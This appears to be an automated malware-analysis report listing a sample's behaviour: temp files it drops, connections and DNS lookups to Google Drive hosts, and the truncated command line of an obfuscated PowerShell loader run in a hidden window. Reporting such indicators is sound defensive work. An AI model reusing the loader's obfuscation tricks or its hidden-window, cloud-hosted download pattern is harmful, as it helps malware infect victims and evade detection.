Technical Information
- %TEMP%\statuernes.txt
- %WINDIR%\temp\cab2b16.tmp
- %WINDIR%\temp\tar2b27.tmp
- %WINDIR%\temp\cab2c6f.tmp
- %WINDIR%\temp\tar2c70.tmp
- %WINDIR%\temp\cab2b16.tmp
- %WINDIR%\temp\tar2b27.tmp
- %WINDIR%\temp\cab2c6f.tmp
- %WINDIR%\temp\tar2c70.tmp
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Skossens Countercharges Overliterariness Dynamised Amices Fastprisordning #>;$Cordyceps=(cmd /c set /A 115^^0);Function Forhaandsudtalelsernes ([String]$Reimposed){$Cordyceps=[char][int]$Cor...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Skossens Countercharges Overliterariness Dynamised Amices Fastprisordning #>;$Cordyceps=(cmd /c set /A 115^^0);Function Forhaandsudtalelsernes ([String]$Reimposed){$Cordyceps=[char][int]$Cor...
- '<SYSTEM32>\cmd.exe' /c set /A 115^^0